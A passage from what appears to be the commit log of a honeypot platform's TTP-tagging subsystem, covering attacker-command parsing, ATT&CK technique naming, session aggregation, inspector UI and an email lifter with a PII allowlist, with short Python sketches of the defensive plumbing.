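    r"^CMD uid=(?P<uid>\S*) user=(?P<user>\S*) src=(?P<src>\S*) "
    r"pwd=(?P<pwd>.*?) cmd=(?P<command>.*)$",
    re.DOTALL,
)

# Engine-controlled aux fields, keyed by source_kind.
AUX_EVIDENCE_FIELDS: dict[str, tuple[str, ...]] = {
    "command": ("uid", "user", "src", "pwd"),
}


def parse_cmd_msg(msg: str) -> Optional[dict[str, str]]:
    """Split the bash CMD body into fields; None when it does not match."""
    match = _CMD_RE.match(msg)
    return match.groupdict() if match else None


def build_evidence(
    source_kind: str, payload: dict[str, Any], evidence_fields: list[str]
) -> dict[str, Any]:
    """Rule-declared fields plus aux fields, skipping absent/None values."""
    keys = list(evidence_fields) + list(AUX_EVIDENCE_FIELDS.get(source_kind, ()))
    return {k: payload[k] for k in keys if payload.get(k) is not None}
```

Because `cmd=` is matched last with a greedy tail, whitespace inside
the command survives intact.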
2026-05-02 03:20:53 -04:00
84699f89da feat(ttp): show canonical ATT&CK technique names in the TTPs UI
"T1595" alone is opaque; "T1595 — Active Scanning" tells you the
story at a glance. The names come from a backend-side static catalogue
pinned to the same ATT&CK release as the rule engine
(_ATTACK_RELEASE = "v15.1") — names are the canonical MITRE labels,
not author-supplied strings on rules, so a rule author can't typo a
name and the entire fleet sees the typo.

- New `decnet/ttp/attack_catalog.py` with `TECHNIQUE_NAMES` covering
  every technique_id + sub_technique_id emitted by `rules/ttp/`
  (R0001..R0058 → 69 IDs in the v0 pack).
- `IdentityTechniqueRow` / `TechniqueRollupRow` / `CampaignTechniqueRow`
  / `TTPTagDetailRow` gain optional `technique_name` /
  `sub_technique_name` fields. Repo + router populate them from the
  catalogue at row-construction time. None when an ID isn't in the
  catalogue — UI falls back to the bare ID.
- Coverage test (`tests/ttp/test_attack_catalog.py`) walks every
  YAML rule and asserts every emitted ID has a catalogue entry, so
  a future rule author who forgets to update the catalogue gets a
  loud failure rather than a silent UI fallback.

Frontend:
- `TTPsObservedSection` shows "T1595.002 — Active Scanning:
  Vulnerability Scanning" instead of just the ID, with overflow
  ellipsis + tooltip for narrow viewports. Inspector header /
  TECHNIQUE row also surface the names.
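
A sketch of the lookup and the coverage check. The three-entry dict
is a tiny illustrative excerpt, and how the real `TECHNIQUE_NAMES`
keys sub-techniques is an assumption.

```python
from typing import Iterable, Optional

# Excerpt for illustration only; names are the MITRE ATT&CK labels.
TECHNIQUE_NAMES: dict[str, str] = {
    "T1059": "Command and Scripting Interpreter",
    "T1595": "Active Scanning",
    "T1595.002": "Vulnerability Scanning",
}


def resolve_names(
    technique_id: str, sub_technique_id: Optional[str] = None
) -> tuple[Optional[str], Optional[str]]:
    """(technique_name, sub_technique_name); None for unknown ids."""
    name = TECHNIQUE_NAMES.get(technique_id)
    sub_name = TECHNIQUE_NAMES.get(sub_technique_id) if sub_technique_id else None
    return name, sub_name


def missing_from_catalogue(emitted_ids: Iterable[str]) -> list[str]:
    """Ids emitted by rules that have no catalogue entry."""
    return sorted(set(emitted_ids) - set(TECHNIQUE_NAMES))
```

A coverage test would feed every id found in the rule YAMLs to
`missing_from_catalogue` and assert the result is empty.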
2026-05-02 03:10:07 -04:00
42e9492118 feat(ttp): inspector drawer surfaces evidence + rule_id behind each technique
The TTPsObservedSection rollup tells the operator "we saw T1059" but
not why. Click any technique row → side drawer opens listing every
ttp_tag row in scope with the persisted evidence JSON, firing
rule_id / rule_version, source_kind / source_id, confidence, and
created_at. Mirrors the CredentialReuseInspector / BountyInspector
pattern (drawer-backdrop + bd-head/bd-body + kvs grid).

Backend:
- New `GET /api/v1/ttp/tags/by-{scope}/{uuid}/{technique_id}`
  (`scope ∈ {identity, attacker, session}`, optional
  `?sub_technique_id=`, `?limit=` capped to 1000). Returns raw
  TTPTag rows newest-first.
- New `TTPTagDetailRow` Pydantic model + re-export.
- New repo method `list_tags_by_scope_and_technique` on
  TTPMixin (+ abstract on BaseRepository) — single query branched
  on scope; identity scope projects through `Attacker.identity_id`
  the same way `list_techniques_by_identity` does.
- Tests: evidence round-trips, sub_technique filter, JWT-required,
  empty scope, unknown scope rejected.

Frontend:
- New `TTPInspector.tsx` + `TTPInspector.css` (violet accent, slide
  animation, focus-trapped panel matching the existing inspector
  family).
- `TTPsObservedSection`'s TechniqueBar is now click+keyboard
  activatable; clicking opens the inspector for that
  (technique, sub_technique) tuple.

mypy clean. 532 passed in the targeted sweep.
2026-05-02 02:55:05 -04:00
c4e29e3bf9 fix(ttp): resolve attacker_uuid from attacker_ip on bus-event consume
The collector's `attacker.session.ended` envelope carries
`attacker_uuid: null` and `attacker_ip: <ip>` because the collector
doesn't talk to the DB. The TTP worker passed that null straight
through, and `TTPTag.__init__` raised the documented invariant:

    ValueError: ttp_tag requires at least one of attacker_uuid /
                identity_uuid; both NULL is not a valid anchor.

The worker now resolves `attacker_uuid` from `attacker_ip` via
`BaseRepository.get_attacker_uuid_by_ip` before fanning out the
event. When the IP isn't in the DB yet (profiler hasn't ingested
the row), the event is dropped with one log line — better than
exploding mid-tag.

- New `get_attacker_uuid_by_ip(ip) -> str | None` on the repo
  (BaseRepository abstract + AttackersCoreMixin impl).
- `_resolve_attacker_uuid` helper in `decnet/ttp/worker.py` runs
  before `_build_events`. Short-circuits when the payload already
  has either anchor; drops the event when neither anchor is
  resolvable.
- Tests pin: short-circuit on existing uuid/identity, repo lookup,
  drop on unknown IP, drop on "Unknown" sentinel, drop on
  no-anchor payload, drop on repo failure.
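
The resolution rules can be sketched as below. This version is
synchronous for brevity and uses a hypothetical `AttackerLookup`
protocol; the real repository method may well be async.

```python
import logging
from typing import Any, Optional, Protocol

log = logging.getLogger("ttp.worker.sketch")


class AttackerLookup(Protocol):
    def get_attacker_uuid_by_ip(self, ip: str) -> Optional[str]: ...


def resolve_attacker_uuid(
    payload: dict[str, Any], repo: AttackerLookup
) -> Optional[dict[str, Any]]:
    """Return a payload with an anchor, or None when it must be dropped."""
    if payload.get("attacker_uuid") or payload.get("identity_uuid"):
        return payload  # short-circuit: an anchor is already present
    ip = payload.get("attacker_ip")
    if not ip or ip == "Unknown":
        log.info("dropping event: no resolvable anchor")
        return None
    try:
        uuid = repo.get_attacker_uuid_by_ip(ip)
    except Exception:
        log.warning("dropping event: repo lookup failed for %s", ip)
        return None
    if uuid is None:
        log.info("dropping event: %s not in DB yet", ip)
        return None
    return {**payload, "attacker_uuid": uuid}
```

Returning a new dict rather than mutating the payload keeps the
original bus event untouched for any other consumer.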
2026-05-02 02:44:30 -04:00
f9901befc4 docs(ttp): catalogue producer wiring for every TTP-watched topic
Add a "Producer wiring" subsection under TTP_TAGGING.md §"Bus
topics" mapping every topic the TTP worker subscribes to onto the
file:line that publishes it. Calls out the gap (`email.received`
has no producer today) and the new `attacker.session.ended`
payload shape from the collector aggregator.

Also lists the four producer regression tests added in this series
so a future contributor sees the safety net before staring at the
silent rule engine.

DEBT.md gets the `attacker.email.received` follow-up entry — wire
the producer when SMTP-receive persistence lands, since today the
honeypot relay path doesn't store received emails anywhere a
publisher could read from.
2026-05-02 02:39:23 -04:00
b5ce236cab test(bus): pin scope-(2) producer wiring for reuse / clusterer / intel
Three producer-side regression guards. Each drives the worker's run
loop with a fake bus + stubbed repo and asserts the documented topic
fires when the producer has data:

- reuse correlator → credential.reuse.detected (one finding row)
- clusterer → identity.formed + identity.merged (one ClusterResult)
- intel worker → attacker.intel.enriched (one unenriched attacker
  + a fake provider returning a "malicious" verdict)

These complement commit 1's attacker.session.ended producer test —
together the four cover every TTP-relevant publisher in the tree
(modulo email.received, which has no producer yet; tracked in
DEBT.md).
2026-05-02 02:38:24 -04:00
b043c96d29 feat(collector): publish attacker.session.ended on session_recorded events
The TTP worker subscribes to attacker.session.ended but no upstream
component published it — the rule pack (R0001–R0030) therefore never
fired on live SSH traffic even after the consume-side wiring landed
in E.3.18a/b/c.

The collector now hosts a per-attacker_ip command index
(_SessionAggregator) that watches the same parsed-event stream as
_publish_log. Shell `command` events are appended to a per-IP list;
on `session_recorded` the aggregator slices the list to commands
inside the [ended_at - duration_s, ended_at] window and publishes
attacker.session.ended with the session metadata + commands list.
The TTP worker's _build_events fan-out (E.3.18b) turns each command
into a source_kind="command" TaggerEvent that the RuleEngineTagger
(E.3.18c) matches against R0001–R0030.

Memory bound: per-IP entries TTL-evict at DECNET_COLLECTOR_SESSION_AGG_TTL_SEC
(default 3600 s). Publish failures are swallowed in the aggregator —
a misbehaving bus cannot stall the per-container stream threads.
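
A simplified sketch of the windowing and TTL logic. The class below
is a hypothetical, single-threaded stand-in for `_SessionAggregator`;
locking, bus publishing and the full envelope shape are left out.

```python
from collections import defaultdict
from typing import Any


class SessionAggregator:
    """Per-IP command index with window slicing and TTL eviction."""

    def __init__(self, ttl_sec: float = 3600.0) -> None:
        self._ttl = ttl_sec
        self._commands: dict[str, list[tuple[float, str]]] = defaultdict(list)

    def add_command(self, ip: str, ts: float, command_text: str) -> None:
        self._commands[ip].append((ts, command_text))

    def end_session(self, ip: str, ended_at: float, duration_s: float) -> dict[str, Any]:
        """Build the envelope from commands inside the session window."""
        start = ended_at - duration_s
        in_window = [
            text for ts, text in self._commands.get(ip, []) if start <= ts <= ended_at
        ]
        return {
            "attacker_ip": ip,
            "attacker_uuid": None,  # the collector does not talk to the DB
            "ended_at": ended_at,
            "duration_s": duration_s,
            "commands": [{"command_text": text} for text in in_window],
        }

    def evict(self, now: float) -> None:
        """Drop entries older than the TTL; remove IPs left empty."""
        cutoff = now - self._ttl
        for ip in list(self._commands):
            kept = [(ts, text) for ts, text in self._commands[ip] if ts >= cutoff]
            if kept:
                self._commands[ip] = kept
            else:
                del self._commands[ip]
```

In the real collector the publish call would be wrapped in a broad
try/except, per the failure-swallowing note above.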
2026-05-02 02:35:08 -04:00
d9d2a80573 fix(collector): unwrap double-wrapped RFC5424 around bash PROMPT_COMMAND
Honeypot SSH containers run `PROMPT_COMMAND` that calls
`logger --rfc5424 --msgid command -t bash "CMD …"`. The Docker-stdout
reader prepends an outer RFC5424 envelope (HOSTNAME=<decky>,
APP-NAME=1, MSGID=NIL) around that inner syslog line. Both the
collector parser (`parse_rfc5424`) and the correlation parser
(`parse_line`) saw the outer NIL MSGID and emitted `event_type="-"`
for every shell command — which:
  - kept `Attacker.commands` rows missing `command_text`
  - left R0001–R0030 (the pattern rule pack that matches shell
    commands) with no haystack
  - made `decnet.collector.log` show `event written … type=-`
    for the very lines that should be `type=command`

Both parsers now detect the inner-RFC5424 shape (`<TS> <HOST> <APP>
<PROCID> <MSGID> <rest>`) when the outer MSGID is NIL and the SD-arm
is also NIL, and re-extract HOSTNAME / APP-NAME / MSGID / remainder
from the body. The collector parser also recovers the post-SD msg
tail when the SD block isn't `relay@55555` (the bash CMD line carries
a `[timeQuality …]` block) so the kv-fallback can find `src_ip`.

Mirroring tests in tests/collector and tests/correlation pin both
the unwrap and the regression guard for non-double-wrapped lines.
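
A deliberately simplified sketch of the unwrap. Both regexes and the
sample lines in the usage note are assumptions; the real parsers also
recover the post-SD tail and `src_ip`, which is omitted here.

```python
import re
from typing import Optional

_OUTER_RE = re.compile(
    r"^<(?P<pri>\d{1,3})>1 (?P<ts>\S+) (?P<host>\S+) (?P<app>\S+) "
    r"(?P<procid>\S+) (?P<msgid>\S+) (?P<sd>-|\[.*?\])(?: (?P<msg>.*))?$",
    re.DOTALL,
)
# Inner shape from the message: <TS> <HOST> <APP> <PROCID> <MSGID> <rest>
_INNER_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\S+) (?P<host>\S+) (?P<app>\S+) "
    r"(?P<procid>\S+) (?P<msgid>\S+) (?P<rest>.*)$",
    re.DOTALL,
)


def parse_line(line: str) -> Optional[dict[str, str]]:
    """Parse an RFC5424 line, unwrapping a nested inner header if present."""
    outer = _OUTER_RE.match(line)
    if outer is None:
        return None
    fields = {
        "hostname": outer["host"],
        "app_name": outer["app"],
        "msgid": outer["msgid"],
        "msg": outer["msg"] or "",
    }
    # Only attempt the unwrap when both outer MSGID and SD are NIL.
    if outer["msgid"] == "-" and outer["sd"] == "-":
        inner = _INNER_RE.match(fields["msg"])
        if inner is not None:
            fields.update(
                hostname=inner["host"],
                app_name=inner["app"],
                msgid=inner["msgid"],
                msg=inner["rest"],
            )
    fields["event_type"] = fields["msgid"]
    return fields
```

Requiring the body to start with an ISO-style timestamp is what keeps
ordinary NIL-MSGID lines from being misread as double-wrapped.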
2026-05-02 02:32:21 -04:00
e08bfc4a73 fix(ttp): /api/v1/ttp/rules returns the live rule catalogue
The endpoint was a contract-phase stub returning `[]` even though the
RuleStore loaded all 58 YAML rules at worker startup. UI saw an empty
table; operators couldn't tell whether anything was wired up.

- `api_list_rules` now calls `get_rule_store().load_compiled()` and
  serializes each CompiledRule + its operational state into a
  RuleCatalogueRow. Sorted by rule_id for stable golden snapshots.
- Add `description: str` to RuleSchema (pydantic) and CompiledRule
  (NamedTuple, defaulted) + propagate through `_compile_one` so the
  catalogue surfaces the human-readable YAML description, not just
  the slug-style `name`.
- Update `tests/ttp/test_rule_engine.py` _fields assertion for the
  new column; new `tests/api/ttp/test_rules_catalogue.py` pins the
  catalogue contents (R0001/R0014 presence, row shape, sort order).

Worker behaviour is unchanged: it was already loading rules
correctly. This is purely a read-side wiring fix on the operator API.
2026-05-02 01:54:06 -04:00
7ab0df3680 chore(cleaning): deleted swp vimfile 2026-05-02 01:39:17 -04:00
ca1e04033c docs(ttp): E.5 verification log appended to TTP_TAGGING.md
Closes the CDD design phase. Records:
- §E.1 contract inventory (every file exists, compileall clean).
- Targeted pytest pass: 604 passed, 1 skipped, 10 xfailed
  (all xfails are `xfail(strict=True)` with reason= pointing to the
  impl step that flips them; carry-overs, not flakes).
- Strict mypy over decnet/ttp + decnet/cli/ttp.py +
  decnet/web/router/ttp + decnet/web/db/sqlmodel_repo/ttp.py: clean.
- Stranger-readability spot check on tests/ttp/: no doc bugs.

Notes the three pre-E.4 wiring fixes (E.3.18a/b/c) and the E.4
backfill CLI / DEBT entries that landed in this series.
2026-05-02 01:37:45 -04:00
7d1f048764 docs(ttp): E.4.b/E.4.c DEBT entries — provider review + Sigma deferral
Quarterly TTP provider mapping review for AbuseIPDB / GreyNoise /
abuse.ch (Feodo Tracker, ThreatFox) catalogue drift against
`rules/ttp/R0054..R0058`, and the post-v1 trigger for the Sigma rule
adapter. Both items reference TTP_TAGGING.md sections so the
rationale stays linked to the design doc.
2026-05-02 01:35:49 -04:00
301d3feee9 feat(ttp): E.4.a extract decnet/cli/ttp.py with worker run + backfill CLI
The TTP worker entry moved out of decnet/cli/workers.py into its own
module so the TTP CLI surface (worker + admin verbs) is colocated,
mirroring decnet/cli/canary.py / webhook.py / swarm.py.

- New `decnet/cli/ttp.py` with `decnet ttp` (worker, ExecStart-stable
  for decnet-ttp.service) and `decnet ttp-backfill --since-days N`.
- `decnet ttp-backfill` walks Attacker.commands and CanaryTrigger
  history, dispatches each row through the live CompositeTagger,
  persists tags via repo.insert_tags (idempotent INSERT OR IGNORE).
  --dry-run / --source command|canary|all / --batch-size supported.
- Backfill deliberately bypasses bus publish — historical replay
  must not re-trigger SIEM/webhook fan-out per TTP_TAGGING.md
  §"Bus topics" loop-prevention invariant.
- Added `iter_attacker_commands_since` / `iter_canary_triggers_since`
  read-only iterators on TTPMixin + abstract bindings on
  BaseRepository.
- Master-only via gating; both `ttp` and `ttp-backfill` listed in
  MASTER_ONLY_COMMANDS.
2026-05-02 01:35:17 -04:00
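The idempotent persistence that 301d3feee9 relies on can be sketched with the standard-library `sqlite3` module. The `ttp_tag` table layout and this `insert_tags` signature are assumptions for illustration, not the project's repository API.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE ttp_tag (uuid TEXT PRIMARY KEY, technique_id TEXT)")


def insert_tags(conn: sqlite3.Connection, tags: list[tuple[str, str]]) -> int:
    """Insert tags, skipping rows whose uuid already exists; return rows written."""
    before = conn.total_changes
    conn.executemany(
        "INSERT OR IGNORE INTO ttp_tag (uuid, technique_id) VALUES (?, ?)", tags
    )
    conn.commit()
    return conn.total_changes - before


batch = [("tag-1", "T1110"), ("tag-2", "T1078")]
first_pass = insert_tags(conn, batch)   # initial backfill run
second_pass = insert_tags(conn, batch)  # replay of the same history
```

Because the primary key is deterministic per tag, re-running a backfill over the same window writes nothing new.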
e84b522fd3 feat(ttp): E.3.18c wire RuleEngine via RuleEngineTagger
The canonical rule-based engine from §"Tagging engines, layered §1"
of TTP_TAGGING.md was fully implemented but never instantiated as a
composite child — pure pattern rules (R0014/R0017/R0023/... 23 rules
total) had no tagger to dispatch them.

- Add `RuleEngineTagger(Tagger)` adapter in rule_engine.py wrapping
  `RuleEngine.evaluate()`. `HANDLES = {command, http_request,
  auth_attempt, payload}` — the source kinds whose rules typically
  live outside any per-source lifter.
- Adapter's `watch_store()` filters via `_is_engine_owned` so the
  engine's dispatch index excludes lifter-claimed rules
  (`match.kind: lifter:*`) and stays disjoint from per-lifter ownership.
- Prepend `RuleEngineTagger` to the `CompositeTagger` lifter list so
  generic pattern rules dispatch before per-source cross-event logic.
- Composes with E.3.18a (worker hydrates `watch_store`) and E.3.18b
  (worker fans session payloads into per-`command` events) — together
  these three commits make R0001–R0030 actually fire at runtime.
2026-05-02 01:29:58 -04:00
65435f1427 feat(ttp): E.3.18b worker fans session-ended payloads into per-command events
R0001–R0030 declare `applies_to: [command]` and match per command, not
per session. The worker now translates one `attacker.session.ended`
payload carrying a `commands: list` into:
  - one source_kind="session" event (behavioral / cross-event lifters)
  - one source_kind="command" event per command (RuleEngineTagger)

Both string and dict command shapes are accepted; dicts contribute
their `id` / `uuid` / `command_id` as the per-command source_id so
the deterministic `compute_tag_uuid` keeps replays idempotent. Tags
from session + per-command dispatch are aggregated into a single
`ttp.tagged` envelope per upstream session.
2026-05-02 01:27:37 -04:00
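The fan-out in 65435f1427 might look roughly like the following. The event dict shape, the `command_text` key, and the `session_id:index` fallback for bare-string commands are assumptions made for this sketch; only the `id` / `uuid` / `command_id` lookup comes from the commit message.

```python
from typing import Any


def fan_out(session_id: str, payload: dict[str, Any]) -> list[dict[str, Any]]:
    """Turn one session-ended payload into a session event plus per-command events."""
    events = [{"source_kind": "session", "source_id": session_id, "payload": payload}]
    for index, cmd in enumerate(payload.get("commands", [])):
        if isinstance(cmd, dict):
            # Dict commands contribute their own stable identifier when present.
            source_id = cmd.get("id") or cmd.get("uuid") or cmd.get("command_id")
            text = cmd.get("command_text", "")
        else:
            source_id, text = None, str(cmd)
        if source_id is None:
            # Assumed fallback: position within the session keeps replays stable.
            source_id = f"{session_id}:{index}"
        events.append({
            "source_kind": "command",
            "source_id": str(source_id),
            "payload": {"command_text": text},
        })
    return events


events = fan_out("s1", {"commands": ["ls", {"id": "c-9", "command_text": "whoami"}]})
```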
44ade3eb63 fix(ttp): E.3.18a worker hydrates per-lifter rule indexes via watch_store
Each per-source lifter holds its own RuleIndex and exposes an
`async watch_store()` that loads the corpus and drains store change
events forever. Until this commit nothing called `watch_store()` in
production — every dispatch index stayed empty and no rule fired.

- Add `WatchableTagger` runtime-checkable Protocol in `decnet.ttp.base`.
- `CompositeTagger.iter_watchables()` yields lifters that satisfy it.
- `run_ttp_worker_loop` fans out one task per watchable, cancelled
  and awaited alongside pump/heartbeat/control in the existing finally.
- Watch failures log and exit the watch task without taking the
  worker down — mirrors the pump-task tolerance contract.
2026-05-02 01:25:15 -04:00
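A sketch of the watchable fan-out from 44ade3eb63, assuming simplified stand-ins for the lifters. `PatternLifter`, `StatelessLifter`, and `run_briefly` are hypothetical names; only `WatchableTagger`, `watch_store`, and `iter_watchables` appear in the commit.

```python
import asyncio
from typing import Iterable, Iterator, Protocol, runtime_checkable


@runtime_checkable
class WatchableTagger(Protocol):
    async def watch_store(self) -> None: ...


class PatternLifter:
    def __init__(self) -> None:
        self.loaded = False

    async def watch_store(self) -> None:
        self.loaded = True            # stand-in for loading the rule corpus
        await asyncio.Event().wait()  # stand-in for draining changes forever


class StatelessLifter:
    """Has no watch_store, so it does not satisfy the Protocol."""


def iter_watchables(lifters: Iterable[object]) -> Iterator[WatchableTagger]:
    for lifter in lifters:
        if isinstance(lifter, WatchableTagger):
            yield lifter


async def run_briefly(lifters: list[object]) -> int:
    tasks = [asyncio.create_task(w.watch_store()) for w in iter_watchables(lifters)]
    try:
        await asyncio.sleep(0)  # yield once so each watch task starts
    finally:
        for task in tasks:
            task.cancel()
        # Collect cancellations instead of letting them propagate.
        await asyncio.gather(*tasks, return_exceptions=True)
    return len(tasks)


lifters = [PatternLifter(), StatelessLifter()]
started = asyncio.run(run_briefly(lifters))
```

Note that a `runtime_checkable` Protocol only checks that the attribute exists, not that it is a coroutine function, so the real code may need a stricter guard.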
9a31d0e50c feat(ttp): E.3.17 worker registration + scoped schemathesis suite
Wires decnet-ttp as a first-class worker:

* `decnet ttp` CLI command (master-only via MASTER_ONLY_COMMANDS)
* deploy/decnet-ttp.service.j2 systemd unit (After= identity / intel
  / reuse-correlator workers; ProtectHome=read-only since
  FilesystemRuleStore only reads ./rules/ttp/)
* deploy/decnet.target Wants= chain extended with decnet-ttp.service
* `ttp` was already in web/worker_registry.KNOWN_WORKERS

tests/api/test_schemathesis_ttp.py: TTP-routes-only schemathesis
suite, filtered via the OpenAPI tags=["TTP Tagging"] annotation
shared by the eight TTP routes. Reuses the live uvicorn subprocess
the wider test_schemathesis spawns; max_examples=400 keeps the
focused gate fast for E.3.13–E.3.16 iteration.

wiki-checkout/Service-Bus.md committed in its own repo: ttp.tagged
and ttp.rule.fired.<id> flipped from "reserved (TTP worker)" to
"decnet.ttp.worker" now that the worker publishes them.
2026-05-01 21:26:46 -04:00
07a609973b feat(ttp): E.3.16 frontend TTP UI
TTPsObservedSection.tsx: shared analyst-facing rollup. scope=
identity drives /ttp/by-identity/{uuid} (primary, with Navigator
export download); scope=attacker drives /ttp/by-attacker/{uuid}
(per-IP slice). Tactic → technique tree in fixed UKC-aligned order,
counts and confidence-weighted bars. Literal "NO TECHNIQUES
OBSERVED YET" empty state per TTP_TAGGING.md §"UI surface — Empty
state": no spinner, no fallback list.

RuleStateControls.tsx: admin-only rule operational state panel
backed by POST/DELETE /ttp/rules/{rule_id}/state. Server-gated by
require_admin AND client-gated on /config?.role so a non-admin
never sees the controls (per feedback_serverside_ui.md the client
gate is UX, not security — the server returns 403 either way).
Wired into Config.tsx as a new "TTP RULES" admin tab.

Wired TTPsObservedSection into IdentityDetail (above fingerprints)
and AttackerDetail (above TIMELINE). DeckyFleet/PersonaGeneration
vocabulary throughout (logs-section / section-header / btn /
matrix-text / dim-chip).

tsc --noEmit and vite build clean.

The dev-server browser smoke test is deferred because the UI can't be
reliably exercised from this harness; typecheck + build is the
correctness gate here, not feature verification.
2026-05-01 21:05:28 -04:00
403d83faba feat(ttp): E.3.15 UKC bridge — production phase-handoff edge fires
Add BaseRepository.list_ttp_decky_phases(identity_uuid) returning
per-decky tag observations as (decky_id, tactic, created_at_ts) rows
ordered by creation time. Rewrite from_identity_row() to project
tactic → UKCPhase via tactic_to_ukc_phase and populate the four
phase-handoff maps (first/last_phase_per_decky,
first/last_seen_per_decky) so combined_campaign_weight finally lights
up on real DB rows — not just synthetic fixtures.

ConnectedComponentsCampaignClusterer.tick() pulls each active
identity's per-decky phase observations before projecting features.
Repo failures are non-fatal: a partial repo falls back to the empty
phase-handoff signal (legacy behavior) so the worker stays up.

tests/clustering/test_ttp_phase_handoff.py pins the production-row
pair clearing CAMPAIGN_EDGE_THRESHOLD on a C2 → DISCOVERY hand-off —
the trip-wire that says the whole project paid off.

commands_by_phase_on_decky itself stays empty on the production path:
it is consumed only by the synthetic-fixture similarity surface, and
the phase-handoff edge does not use it. Synthetic fixtures still
populate it directly via from_synthetic_identity.
2026-05-01 21:01:58 -04:00
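The projection in 403d83faba can be sketched as a single pass over rows ordered by creation time. The two-entry `TACTIC_TO_PHASE` table and the `phase_maps` helper are illustrative assumptions; the real mapping lives in `tactic_to_ukc_phase` and covers more tactics.

```python
# Hypothetical, deliberately tiny tactic -> UKC phase table.
TACTIC_TO_PHASE = {"command-and-control": "C2", "discovery": "DISCOVERY"}


def phase_maps(rows: list[tuple[str, str, int]]) -> dict[str, dict]:
    """Build the four per-decky maps from (decky_id, tactic, created_at_ts) rows.

    Rows are assumed to arrive ordered by created_at_ts, oldest first.
    """
    first_phase: dict[str, str] = {}
    last_phase: dict[str, str] = {}
    first_seen: dict[str, int] = {}
    last_seen: dict[str, int] = {}
    for decky_id, tactic, ts in rows:
        phase = TACTIC_TO_PHASE.get(tactic)
        if phase is None:
            continue  # tactic with no phase in this sketch's table
        if decky_id not in first_phase:
            first_phase[decky_id] = phase
            first_seen[decky_id] = ts
        last_phase[decky_id] = phase
        last_seen[decky_id] = ts
    return {
        "first_phase_per_decky": first_phase,
        "last_phase_per_decky": last_phase,
        "first_seen_per_decky": first_seen,
        "last_seen_per_decky": last_seen,
    }


maps = phase_maps([
    ("decky-a", "command-and-control", 100),
    ("decky-a", "discovery", 160),
    ("decky-b", "discovery", 200),
])
```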
101127247e feat(ttp): E.3.14 worker bootstrap (insert + ttp.tagged publish)
Inner loop drains a per-process asyncio.Queue populated by one pump
task per topic in _TOPICS, dispatches each event through
CompositeTagger, persists via repo.insert_tags(), and publishes
ttp.tagged + per-technique ttp.rule.fired.<id> only when the insert
returned a non-zero rowcount.

CompositeTagger seeded with all six lifters (Behavioral, Intel,
CanaryFingerprint, Email, Identity, Credential).

Loop-prevention invariant from TTP_TAGGING.md §"Bus topics" enforced:
N replays of the same upstream event publish exactly one ttp.tagged
event. test_worker_bus covers both the direct invocation path and
the idempotency replay path.

Intel catch-up via attacker.session.ended is intentionally deferred
to E.3.14b — needs a session→intel join the repo doesn't expose yet.
2026-05-01 20:57:57 -04:00
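The loop-prevention rule in 101127247e (publish only when the insert wrote something) can be illustrated with an in-memory stand-in. `InMemoryRepo` and `handle_event` are hypothetical; the real worker is async and publishes to the bus rather than appending to a list.

```python
class InMemoryRepo:
    """Stand-in repository: remembers tag UUIDs and reports how many were new."""

    def __init__(self) -> None:
        self._seen: set[str] = set()

    def insert_tags(self, tag_uuids: list[str]) -> int:
        new = set(tag_uuids) - self._seen
        self._seen |= new
        return len(new)


def handle_event(repo: InMemoryRepo, tag_uuids: list[str], published: list[str]) -> None:
    # Publish only when the insert actually wrote at least one row.
    if repo.insert_tags(tag_uuids) > 0:
        published.append("ttp.tagged")


repo = InMemoryRepo()
published: list[str] = []
for _ in range(3):  # three replays of the same upstream event
    handle_event(repo, ["tag-1", "tag-2"], published)
```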
322fd44d72 feat(ttp): E.3.13 IdentityLifter + CredentialLifter (R0001-R0006)
IdentityLifter owns lifter:identity_* — currently R0003 (password
spraying). CredentialLifter owns lifter:credential_* — R0001 generic
auth brute, R0002 password guessing, R0004 credential reuse, R0005
valid-account use, R0006 default credentials.

YAMLs R0001/R0002/R0003/R0005/R0006 had their match.kind normalised
to fit the lifter prefix scheme — the design doc's promised "YAMLs
normalised in a separate refactor commit" lands here.

Identity-rollup tags null out attacker_uuid on emit so the worked-
example invariant holds (the tag belongs to the Identity, never to
one member IP).

Tests: test_identity_lifter.py + test_credential_lifter.py cover
each predicate's positive/negative path, state modulation
(disabled/clipped/expired), source-kind gating, and idempotent
replay. test_lifter_absence and test_lifters updated for the new
ctor signature.
2026-05-01 20:52:56 -04:00
62ad76615e docs(ttp): mark E.3.9-E.3.12 lifters done
Records the RuleIndex extraction prerequisite, the lifter:<owner>_
prefix routing convention, per-provider technique fan-out logic for
intel rules, the canary identity-merge guard rail, and the email PII
allowlist + R0042 simhash requirement.
2026-05-01 20:31:47 -04:00
7a89fbb357 feat(ttp): E.3.12 EmailLifter (R0041-R0048)
SMTP message-level technique tagger per Appendix A.6: open relay abuse
(rcpt_count + foreign From), mass phishing (rcpt_count + body simhash),
phishing-kit X-Mailer, IDN/punycode URL, sender masquerade composite
(From/Return-Path/DKIM/SPF), malicious attachment (macro/.lnk/.iso/.img/
hash match), BEC subject+body composite, encoded payload in body.

PII discipline (TTP_TAGGING.md §'Hard parts §6') is enforced at the
lifter layer via _filter_evidence(): emitted TTPTag.evidence is
restricted to the EmailEvidence-allowed allowlist (body_sha256,
matched_headers — names only, rcpt_domain_set — domains only,
attachment_sha256s, rcpt_count) plus PII-safe match discriminators
(matched_kit, matched_trigger, matched_url_host, etc). Raw addresses,
raw body bytes, full URLs, and decoded base64 previews NEVER appear in
evidence — defense-in-depth over the YAML evidence_fields hint.

Tests: tests/ttp/test_email_lifter.py per-rule positive + negative +
PII allowlist guard + state modulation. tests/ttp/rule_precision/
test_email_rules.py xfail flipped to real precision (R0041-R0048
H-band ≥95%). Corpus rows updated to acknowledge that R0045 (masquerade)
co-fires with R0041 / R0047 when the sender-masquerade signals are
present alongside open-relay or BEC patterns — overlap is by design,
not a precision bug.
2026-05-01 20:31:03 -04:00
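The allowlist filtering described in 7a89fbb357 could be sketched as below. The key set is partial (the commit lists the discriminators with an "etc"), and `filter_evidence` here is a simplified stand-in for the lifter's `_filter_evidence()`.

```python
from typing import Any

# Keys named in the commit message; the real allowlist may contain more.
ALLOWED_EVIDENCE_KEYS = frozenset({
    "body_sha256",
    "matched_headers",
    "rcpt_domain_set",
    "attachment_sha256s",
    "rcpt_count",
    "matched_kit",
    "matched_trigger",
    "matched_url_host",
})


def filter_evidence(raw: dict[str, Any]) -> dict[str, Any]:
    """Keep only allowlisted keys so raw addresses or bodies never leak out."""
    return {k: v for k, v in raw.items() if k in ALLOWED_EVIDENCE_KEYS}


evidence = filter_evidence({
    "body_sha256": "ab12",
    "rcpt_count": 40,
    "from_address": "someone@example.com",  # PII: must be dropped
    "body": "raw message text",             # raw body: must be dropped
})
```

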